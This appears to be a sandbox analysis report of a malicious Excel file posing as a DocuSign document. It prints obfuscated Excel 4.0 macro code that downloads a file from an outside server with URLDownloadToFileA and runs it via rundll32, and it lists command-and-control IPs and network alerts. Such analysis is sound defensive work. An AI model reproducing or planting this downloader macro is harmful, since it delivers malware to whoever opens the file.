Data Raw: | 09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
,,,,,,,,,"=RIGHT(""353454543rtertetr,DllRegister"",12)&V19",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""KJHDFHURNVUTRSHYSTNLUURTHNBDZZLRDNYZru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,,,,,=HALT(),,,
"=FORMULA.FILL(A144,DocuSign!V19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""YJDYJGYDJNUDTUXTNXYXNuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""JDHNLTVJRBNZXKHTFHNMXTFUXTownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCC""&A146,""YUTVUBSRNYTMYM"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=YUTVUBSRNYTMYM(0,T137&D144&E144&E145&E146&E147,D141,0,0)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""hLKUYFBGVESLTNZBRHYMHYRZndll32"",6)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""XCVBDSTYFGYSDUZGKLRDHZTDJ..\BASE.BABAA"",13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,Server,,,www.chipmania.it/mails/open,.,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,BB,,,,h,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
02/20/21-03:20:19.152823 | TCP | 2404348 | ET CNC Feodo Tracker Reported CnC Server TCP group 25 | 49166 | 443 | 192.168.2.22 | 94.140.114.136 |
02/20/21-03:21:02.841833 | TCP | 2404306 | ET CNC Feodo Tracker Reported CnC Server TCP group 4 | 49168 | 443 | 192.168.2.22 | 142.202.191.164 |
02/20/21-03:21:05.665889 | TCP | 2404332 | ET CNC Feodo Tracker Reported CnC Server TCP group 17 | 49170 | 443 | 192.168.2.22 | 45.155.173.242 |
02/20/21-03:21:50.785864 | TCP | 2404324 | ET CNC Feodo Tracker Reported CnC Server TCP group 13 | 49173 | 443 | 192.168.2.22 | 200.52.147.93 |
02/20/21-03:22:15.668490 | TCP | 2404314 | ET CNC Feodo Tracker Reported CnC Server TCP group 8 | 49175 | 443 | 192.168.2.22 | 182.253.107.34 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 20, 2021 03:20:08.290577888 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 03:20:08.341211081 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 03:21:03.812624931 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 03:21:03.874272108 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 03:21:03.890100956 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 03:21:03.948726892 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 03:22:17.945517063 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 03:22:17.997308969 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 03:22:17.999011040 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 03:22:18.059031010 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Feb 20, 2021 03:20:08.290577888 CET | 192.168.2.22 | 8.8.8.8 | 0x2c09 | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 20, 2021 03:22:17.945517063 CET | 192.168.2.22 | 8.8.8.8 | 0x758f | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 20, 2021 03:22:17.999011040 CET | 192.168.2.22 | 8.8.8.8 | 0xa016 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Feb 20, 2021 03:20:08.341211081 CET | 8.8.8.8 | 192.168.2.22 | 0x2c09 | No error (0) | chipmania.it | CNAME (Canonical name) | IN (0x0001) | ||
Feb 20, 2021 03:20:08.341211081 CET | 8.8.8.8 | 192.168.2.22 | 0x2c09 | No error (0) | 185.81.0.78 | A (IP address) | IN (0x0001) | ||
Feb 20, 2021 03:22:17.997308969 CET | 8.8.8.8 | 192.168.2.22 | 0x758f | No error (0) | 176.58.123.25 | A (IP address) | IN (0x0001) | ||
Feb 20, 2021 03:22:18.059031010 CET | 8.8.8.8 | 192.168.2.22 | 0xa016 | No error (0) | 176.58.123.25 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 185.81.0.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 20, 2021 03:20:08.414331913 CET | 0 | OUT | |
Feb 20, 2021 03:20:08.481328964 CET | 2 | IN |